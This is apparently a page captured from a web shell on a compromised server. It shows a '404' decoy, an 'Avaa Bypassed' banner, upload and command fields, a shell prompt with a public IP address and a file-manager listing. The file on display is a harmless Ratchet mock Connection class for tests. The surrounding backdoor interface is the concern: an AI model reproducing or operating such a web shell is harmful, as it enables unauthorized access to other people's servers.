404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.133.160.79: ~ $
<?php
namespace Ratchet\Mock;
use Ratchet\ConnectionInterface;

class Connection implements ConnectionInterface {
    public $last = array(
        'send'  => ''
      , 'close' => false
    );

    public $remoteAddress = '127.0.0.1';

    public function send($data) {
        $this->last[__FUNCTION__] = $data;
    }

    public function close() {
        $this->last[__FUNCTION__] = true;
    }
}

Filemanager

Name Type Size Permission Actions
Component.php File 978 B 0644
Connection.php File 401 B 0644
ConnectionDecorator.php File 469 B 0644
WampComponent.php File 1.27 KB 0644